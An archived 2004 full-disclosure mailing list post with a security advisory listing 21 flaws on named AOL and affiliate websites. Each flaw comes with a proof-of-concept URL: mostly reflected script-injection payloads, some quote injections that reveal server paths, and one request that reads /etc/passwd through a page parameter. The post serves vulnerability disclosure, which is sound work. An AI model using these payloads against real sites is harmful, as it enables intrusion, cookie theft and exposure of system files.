lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200412261858.57218.michel.blomgren@tigerteam.se>
Date: Sun, 26 Dec 2004 18:58:57 +0100
From: Michel Blomgren <michel.blomgren@...erteam.se>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: Multiple vulnerabilities in AOL and AOL affiliate
	web sites



              tigerteam.se security advisory - TSEAD-200412-2
                              www.tigerteam.se

     Advisory: Multiple vulnerabilities in AOL and AOL affiliate web sites
         Date: Sat Dec 18 15:47:40 EST 2004
  Application: Multiple AOL web applications were found to be vulnerable
Vulnerability: XSS, Path disclosure, and system file read access
               vulnerabilities
    Reference: TSEAD-200412-2
       Author: Xavier de Leon <xavier@...erteam.se>


SYNOPSIS

http://www.corp.aol.com/whoweare/mission.shtml


VULNERABILITY

The AOL and AOL affiliate web sites have similar coding practices in some
specific cases, and suffer from the same or similar vulnerabilities.


COMMENT 

I literally went link to link, choosing scripts at random and manually testing
for input validation bugs, XSS, and so on. And so I assume the number of bugs
is actually greater.


DISCOVERY

Xavier de Leon <xavier@...erteam.se>


EXPLOITATION

1) Description: multiple XSS attacks in "report.adp" script:
   Attack: a) 
http://www.aim.com/help_faq/report.adp?type=><script>alert("fubar")</script>
           b) 
http://www.aim.com/help_faq/report.adp?plat=><script>alert("fubar")</script>
           c) 
http://www.aim.com/help_faq/report.adp?num=><script>alert("fubar")</script>
           d) 
http://www.aim.com/help_faq/report.adp?ver=><script>alert("fubar")</script>
           e) 
http://www.aim.com/help_faq/report.adp?aolp=><script>alert("fubar")</script>

2) Description: XSS attack in help_faq/starting_out's "index.asp" script:
   Attack: a) 
http://www.aim.com/help_faq/starting_out/index.adp?aolp=><script>alert("fubar")</script>

3) Description: XSS attack in "catId" variables on multiple .adp scripts:
   Attack: a) 
http://help.channels.aol.com/article.adp?catId="><script>alert("fubar")</script>&articleId=0
           b) 
help.channels.aol.com/topic.adp?catId="><script>alert("fubar")</script>&sCId=0

4) Description: Input validation attacks and path disclosure in "file_id"
   variable over multiple scripts:
   Attack: a) http://downloads.aol.com.br/files/incr.php?file_id=-0
           b) http://downloads.aol.com.br/arquivo.php?file_id=(

5) Description: Input validation attacks and path disclosure in
   "busca_resultado.php" script:
   Attack: a) http://downloads.aol.com.br/busca_resultado.php?search_string='

6) Description: Input validation attacks and path disclosure in
   "subcategoria.php" script:
   Attack: a) http://downloads.aol.com.br/subcategoria.php?cat_subs_id='

7) Description: Path disclosure in "wa" script, part of listserv package.
   Attack: a) http://listserv.aol.com/cgi-bin/wa?A2=/bar&L=foo&P=R1

8) Description: XSS attack in "main_redesign.adp" script:
   Attack: a) 
http://aimtoday.aol.com/features/main_redesign.adp?fid="><script>alert("fubar")</script>
 
9) Description: XSS attack in "price_plan.adp" script:
   Attack: a) 
http://www.aol.ca/tryaol/price_plan.adp?wr_promo=&brand="><script>alert("fubar")</script>
           b) 
http://www.aol.ca/tryaol/price_plan.adp?wr_promo="><script>alert("fubar")</script>&brand=

10) Description:  XSS and Path disclosure attack in "object.adp" script:
    Attack: a) 
http://finance.channels.aol.ca/finance/object.adp?channel=&frame=&type=&id=---!><script>alert("fubar")</script><!---&data&title=
            b) 
http://women.channels.aol.ca/preview/object.adp?frame=&type=&id=---!><script>alert("fubar")</script><!---&data=
            c) 
http://sports.channels.aol.ca/sports/object.adp?channel=&frame=&type=&id=---!><script>alert("fubar")</script><!---&data&title=

11) Description: Path disclosures in multiple aol.com.ar scripts:
    Attack: a) http://foros.aol.com.ar/foro.php3?id_foro='
            b) http://foros.aol.com.ar/toplevel.php3?id_top='
            c) http://foros.aol.com.ar/categorias.php3?id_cat='
            d) http://foros.aol.com.ar/subcategoria.php3?id_subcat='

12) Description: XSS attacks in "zonalibre.adp" script:
    Attack: a) 
http://aol.com.ar/CanalesWeb/zonalibre.adp?Canal=&Id="><script>alert("fubar")</script><!---
            b) 
http://aol.com.ar/CanalesWeb/zonalibre.adp?Canal=<script>alert("fubar")</script>&Id=

13) Description: XSS attacks in "computacion.adp" script:
    Attack: a) 
http://www.aol.com.ar/CanalesWeb/computacion.adp?Canal=<script>alert("fubar")</script>&ID=
            b) 
http://www.aol.com.ar/CanalesWeb/computacion.adp?Canal=&ID="><script>alert("fubar")</script><!---

14) Description: XSS attack in "aolenvivo.adp" script:
    Attack: a) 
http://www.aol.com.ar/CanalesWeb/aolenvivo.adp?Canal=<script>alert("fubar")</script>&ID=

15) Description: XSS attack in "noticias.adp" script:
    Attack: a) 
http://aol.com.ar/CanalesWeb/noticias.adp?Canal=<script>alert("fubar")</script>&Id=

16) Description: XSS attack in "musica.adp" script:
    Attack: a) 
http://aol.com.ar/CanalesWeb/musica.adp?Canal=<script>alert("fubar")</script>&Id=

17) Description: XSS attack in "deportes.adp" script:
    Attack: a) 
http://www.aol.com.ar/CanalesWeb/deportes.adp?Canal=<script>alert("fubar")</script>&ID=

18) Description: XSS attack in "entretenimientos.adp" script:
    Attack: a) 
http://www.aol.com.ar/CanalesWeb/entretenimientos.adp?Canal=<script>alert("fubar")</script>&ID=

19) Description: System file read access vulnerability in "index.adp" script:
    Attack: a) http://www.aol.com.ar/Goyeneche/index.adp?page=/etc/passwd

20) Description: Path disclosure and XSS attack in "holidaydetails.asp"
    script:
    Attack: a) 
http://travel.aol.com.au/holidays/holidaydetails.asp?HolidayId='
    Attack: b) 
http://travel.aol.com.au/holidays/holidaydetails.asp?HolidayId="><script>alert("fubar")</script><!---

21) Description: Path disclosure attacks in "flightreturnsearch.asp" script:
    Attack: a) 
http://travel.aol.com.au/flights/flightreturnsearch.asp?FLTStartDate1Month='
            b) 
http://travel.aol.com.au/flights/flightreturnsearch.asp?FLTEndDate1Month='


ACKNOWLEDGMENTS

I would like to thank the following people in no particular order:
Michel + all my brothers in p-e and uDc, you know who you are.


ABOUT TIGERTEAM.SE

tigerteam.se offers spearhead competence within the areas of vulnerability
assessment, penetration testing, security implementation, and advanced ethical
hacking training. tigerteam.se consists of Michel Blomgren - company owner (M.
Blomgren IT Security) and Xavier de Leon - freelancing IT security consultant.
Together we have worked for organizations in over 15 countries.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ